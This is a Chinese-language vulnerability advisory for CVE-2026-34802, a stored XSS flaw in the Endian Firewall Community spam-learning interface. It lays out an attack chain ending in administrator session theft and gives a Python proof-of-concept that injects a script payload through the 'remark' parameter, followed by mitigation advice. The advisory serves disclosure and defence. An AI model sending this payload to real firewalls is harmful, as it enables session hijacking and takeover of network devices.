IPBUF安全漏洞报告
English
CVE-2026-34802 CVSS 6.4 中危

CVE-2026-34802 Endian Firewall存储型XSS漏洞

披露日期: 2026-04-02

漏洞信息

漏洞编号
CVE-2026-34802
漏洞类型
存储型跨站脚本
CVSS评分
6.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Endian Firewall Community

相关标签

XSS存储型XSSWeb安全Endian FirewallCVE-2026-34802

漏洞概述

Endian Firewall Community 3.3.25及更早版本存在存储型跨站脚本漏洞。该漏洞源于`/cgi-bin/salearn.cgi`接口对用户提交的参数缺乏有效过滤。已认证的攻击者可注入恶意脚本,该脚本会被存储并在其他用户访问时执行,从而窃取敏感信息或劫持会话。

技术细节

该漏洞属于存储型跨站脚本攻击。根据CVSS 3.1向量,漏洞利用复杂度低,需低权限用户认证,且作用域可改变。漏洞点位于`/cgi-bin/salearn.cgi`脚本中,该脚本用于处理垃圾邮件学习相关的请求。应用程序未对`remark`、`user`、`ham`或`spam`等参数进行严格的输入验证和输出编码。攻击者可以构造包含恶意JavaScript代码的HTTP请求发送至服务器。由于数据被持久化存储,当管理员或其他受信任用户浏览包含该恶意数据的页面时,浏览器将解析并执行该脚本。攻击者利用此漏洞可绕过同源策略,窃取Cookie、Session令牌,甚至执行进一步的管理员操作。

攻击链分析

STEP 1
侦察
攻击者发现目标使用的是存在漏洞的Endian Firewall版本(3.3.25及以下)。
STEP 2
获取凭证
攻击者通过钓鱼或其他方式获取一个低权限账户的登录凭证(满足PR:L要求)。
STEP 3
漏洞利用
攻击者向`/cgi-bin/salearn.cgi`发送特制的POST请求,在`remark`等参数中注入恶意JavaScript代码。
STEP 4
载荷存储
服务器将未经过滤的恶意数据存储在数据库或日志文件中,实现持久化。
STEP 5
触发执行
当管理员或其他用户访问包含该恶意数据的页面时,浏览器解析并执行攻击者注入的脚本。
STEP 6
达成目标
攻击者利用执行的马脚窃取管理员的Session ID,进而接管账户权限。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "http://target-endian-firewall/cgi-bin/salearn.cgi" # Malicious XSS payload xss_payload = "<script>alert('CVE-2026-34802-XSS');</script>" # Cookies required for authentication (PR:L) auth_cookies = { "SID": "valid_session_cookie_here" } # Vulnerable parameters based on the description post_data = { "action": "learn", "user": "test", "spam": "1", "ham": "0", "remark": xss_payload # Injecting payload into the vulnerable parameter } try: response = requests.post(target_url, data=post_data, cookies=auth_cookies) if response.status_code == 200: print("[+] Payload sent successfully. Check the interface to trigger the stored XSS.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

Endian Firewall Community <= 3.3.25

防御指南

临时缓解措施
建议立即升级Endian Firewall到最新版本以彻底修复该漏洞。如果暂时无法升级,应限制对`/cgi-bin/salearn.cgi`接口的访问权限,仅允许受信任的管理员IP访问,并部署Web应用防火墙(WAF)规则,以检测和拦截包含常见XSS攻击特征的请求流量。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表